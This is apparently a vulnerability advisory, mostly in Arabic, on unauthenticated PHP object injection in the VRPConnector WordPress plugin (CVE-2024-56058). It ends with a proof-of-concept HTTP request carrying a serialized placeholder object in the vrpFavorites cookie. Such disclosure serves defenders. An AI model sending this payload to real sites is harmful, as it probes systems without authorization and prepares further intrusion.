
VRPConnector <= 2.0.1 - Unauthenticated PHP Object Injection
VRPConnector <= 2.0.1 - حقن كائن PHP غير موثَّق
إضافة VRPConnector لووردبريس معرضة لحقن كائن PHP في الإصدارات حتى 2.0.1 شاملة، وذلك عبر إلغاء تسلسل المدخلات غير الموثوقة. هذا يمكن المهاجمين غير الموثَّقين من حقن كائن PHP. لا توجد سلسلة POP معروفة موجودة في البرنامج الضعيف. إذا وُجدت سلسلة POP عبر إضافة أو قالب إضافي مثبت على النظام المستهدف، فقد تسمح للمهاجم بحذف ملفات عشوائية، أو استرجاع بيانات حساسة، أو تنفيذ كود.
| العنصر | القيمة |
|---|---|
| النوع | إضافة |
| الاسم المختصر | vrpconnector |
| الإصدار المتأثر | 2.0.1 |
| درجة CVSS | 9.8 |
| تصنيف CVSS | حرج |
| متجه CVSS | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CVE | CVE-2024-56058 |
| الحالة | نشط |
GET / HTTP/1.1
Host: kubernetes.docker.internal:8929
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: vrpFavorites=O:20:"PHP_Object_Injection":0:{}
Upgrade-Insecure-Requests: 1
Priority: u=0, i